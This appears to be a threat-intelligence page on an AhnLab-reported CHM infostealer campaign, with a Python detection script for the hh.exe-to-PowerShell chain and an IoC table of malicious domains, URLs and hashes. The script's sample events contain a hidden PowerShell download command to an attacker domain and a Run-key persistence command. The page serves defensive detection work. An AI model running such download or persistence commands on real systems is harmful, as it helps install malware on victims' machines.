Infostealer Distributed via CHM Files
2023-07-27 • AhnLab
AhnLab ASEC detailed a CHM malware wave impersonating Korean financial institutions and insurance companies, timed around regular payment-statement schedules to increase the chance that recipients open the file. When opened, the CHM ran through hh.exe, decompiled its contents into C:\Users\Public\Libraries, executed Docs.jse with wscript, and used PowerShell to download and start an Infostealer payload. AhnLab EDR telemetry showed persistence via a registry autorun entry, follow-on cmd and script execution, and an alg.exe infostealer collecting user PC, directory, and browser information. The stolen data was compressed under Public\Pictures and transmitted to the attacker’s server, with related download infrastructure including tosals[.]ink, frotsy[.]lol, drilts[.]sbs, and crilts[.]cfd.
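The execution chain above (hh.exe spawning a script host, a .jse run out of C:\Users\Public\Libraries, PowerShell launched by the script host and reaching one of the listed domains, and a Run-key autorun write) maps directly onto process-creation telemetry. The following detection script is an added example written for this page, not AhnLab's code: it walks a list of constructed Sysmon/EDR-style process events (dicts with pid, ppid, image, cmdline; the field names and every sample value are assumptions, not data from the report) and flags each stage. Only the domains come from the page's IoC table.

```python
"""Flag the CHM -> hh.exe -> wscript(Docs.jse) -> PowerShell -> autorun chain.

Added example for this page (not AhnLab's code). The event schema and the
SAMPLE_EVENTS below are constructed to resemble EDR process-creation telemetry;
the domain list is taken from the page's IoC table.
"""
import re

# Domains listed in the page's IoC table.
IOC_DOMAINS = {
    "tosals.ink", "atusay.lat", "crilts.cfd", "snexby.sbs", "skrids.cfd",
    "drilts.sbs", "sklims.lat", "sutezy.mom", "akriqa.xyz", "frotsy.lol",
    "snivox.lat", "labimy.ink", "ppangz.mom",
}

PUBLIC_LIBRARIES = r"c:\users\public\libraries"   # drop location named in the report
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
URL_RE = re.compile(r"https?://([a-z0-9.-]+)", re.I)


def image_name(path: str) -> str:
    """Return the lower-cased file name of an image path."""
    return path.rsplit("\\", 1)[-1].lower()


def analyze(events):
    """Return (pid, rule) findings for every stage of the chain seen in events."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        img = image_name(e["image"])
        cmd = e["cmdline"].lower()
        parent = by_pid.get(e["ppid"])
        pimg = image_name(parent["image"]) if parent else ""

        # Stage 1: HTML Help (hh.exe) spawning a script host is rare in normal use.
        if img in SCRIPT_HOSTS and pimg == "hh.exe":
            findings.append((e["pid"], "hh.exe spawned script host"))
        # Stage 2: a .jse executed from the Public\Libraries drop directory.
        if img in SCRIPT_HOSTS and ".jse" in cmd and PUBLIC_LIBRARIES in cmd:
            findings.append((e["pid"], "JSE run from Public\\Libraries"))
        # Stage 3: PowerShell launched by the script host (downloader stage).
        if img in ("powershell.exe", "pwsh.exe") and pimg in SCRIPT_HOSTS:
            findings.append((e["pid"], "script host spawned PowerShell"))
        # Any command line referencing a domain from the IoC table.
        for host in URL_RE.findall(e["cmdline"]):
            if host.lower() in IOC_DOMAINS:
                findings.append((e["pid"], f"IoC domain {host.lower()} in command line"))
        # Persistence: Run-key autorun written through reg.exe.
        if img == "reg.exe" and " add " in cmd and "currentversion\\run" in cmd:
            findings.append((e["pid"], "Run-key autorun added"))
    return findings


# Constructed sample telemetry (assumed values; not taken from the report).
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\hh.exe",
     "cmdline": r'"C:\Windows\hh.exe" C:\Users\victim\Downloads\statement.chm'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Users\Public\Libraries\Docs.jse"},
    {"pid": 400, "ppid": 300,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -w hidden -c "iwr https://tosals.ink/uEH5J.html"'},
    {"pid": 500, "ppid": 400, "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run "
                r"/v alg /d C:\Users\Public\Libraries\alg.exe"},
    # Benign: a logon script started by explorer, not from Public\Libraries.
    {"pid": 600, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Scripts\logon.vbs"},
]

if __name__ == "__main__":
    for pid, rule in analyze(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
```

The parent-child checks (hh.exe to wscript, wscript to PowerShell) carry most of the signal; the IoC-domain match is the weakest rule because the domains in the table had a lifetime of days, so keep the behavioural rules even after the domain list has aged out.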
Indicators of Compromise
| Type | Value | First Seen | Last Seen |
|---|---|---|---|
| URL | https://tosals.ink/uEH5J.html | 2023-07-21 | 2023-08-30 |
| DOMAIN | tosals.ink | 2023-07-21 | 2023-08-30 |
| URL | https://atusay.lat/kxydo | 2023-07-20 | 2023-08-30 |
| DOMAIN | atusay.lat | 2023-07-20 | 2023-08-30 |
| URL | https://crilts.cfd/cdeeb | 2023-07-20 | 2023-08-25 |
| DOMAIN | crilts.cfd | 2023-07-20 | 2023-08-25 |
| HASH | 150e53a8c852ac5f23f47aceef452542 | 2023-07-21 | 2023-07-27 |
| URL | https://snexby.sbs/svbgt | 2023-07-21 | 2023-07-27 |
| URL | https://skrids.cfd/elzal | 2023-07-21 | 2023-07-27 |
| URL | https://tosals.ink/kxydo | 2023-07-21 | 2023-07-27 |
| URL | https://drilts.sbs/zcwq | 2023-07-21 | 2023-07-27 |
| URL | https://sklims.lat/sbjcw | 2023-07-21 | 2023-07-27 |
| URL | https://sutezy.mom/nmjnq | 2023-07-21 | 2023-07-27 |
| URL | https://akriqa.xyz/qcknq | 2023-07-21 | 2023-07-27 |
| URL | https://frotsy.lol/cvxxv | 2023-07-21 | 2023-07-27 |
| URL | https://snivox.lat/craig | 2023-07-21 | 2023-07-27 |
| DOMAIN | akriqa.xyz | 2023-07-21 | 2023-07-27 |
| DOMAIN | snexby.sbs | 2023-07-21 | 2023-07-27 |
| DOMAIN | sklims.lat | 2023-07-21 | 2023-07-27 |
| DOMAIN | sutezy.mom | 2023-07-21 | 2023-07-27 |
| DOMAIN | skrids.cfd | 2023-07-21 | 2023-07-27 |
| DOMAIN | frotsy.lol | 2023-07-21 | 2023-07-27 |
| DOMAIN | drilts.sbs | 2023-07-21 | 2023-07-27 |
| DOMAIN | snivox.lat | 2023-07-21 | 2023-07-27 |
| HASH | 0f27c6e760c2a530ee59d955c566f6da | 2023-07-20 | 2023-07-27 |
| HASH | 59a924bb5cb286420edebf8d30ee424b | 2023-07-20 | 2023-07-27 |
| HASH | bfe2a0504f7fb1326128763644c88d37 | 2023-07-20 | 2023-07-27 |
| HASH | aaeb059d62c448cbea4cf96f1bbf9efa | 2023-07-20 | 2023-07-27 |
| URL | https://labimy.ink/rskme | 2023-07-20 | 2023-07-27 |
| URL | https://ppangz.mom/mjifi | 2023-07-20 | 2023-07-27 |
| DOMAIN | ppangz.mom | 2023-07-20 | 2023-07-27 |
| DOMAIN | labimy.ink | 2023-07-20 | 2023-07-27 |